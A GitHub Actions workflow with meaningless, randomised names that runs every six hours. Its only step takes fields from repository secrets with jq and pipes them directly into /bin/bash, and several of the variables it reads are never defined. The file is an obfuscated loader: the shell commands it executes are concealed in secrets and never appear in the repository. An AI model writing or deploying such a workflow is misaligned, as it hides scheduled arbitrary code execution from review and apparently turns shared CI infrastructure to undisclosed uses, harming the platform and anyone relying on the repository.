name: huangsanhe5647
on:
  workflow_dispatch:
  schedule:
    - cron: '45 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: huangsanhe5647
        env:
          rd900: ${{ secrets.rd900 }}
        run: |
          echo $rd900 | jq -r .jum2041 | /bin/bash
          echo $mrq940 | jq -r .hwnl4835 | /bin/bash
          echo $uiyvc7 | jq -r .rt84337 | /bin/bash
          echo $ywfe5 | jq -r .svhf17 | /bin/bash
          echo $fp38938 | jq -r .yygsd67 | /bin/bash
          echo $qd75 | jq -r .gh346 | /bin/bash

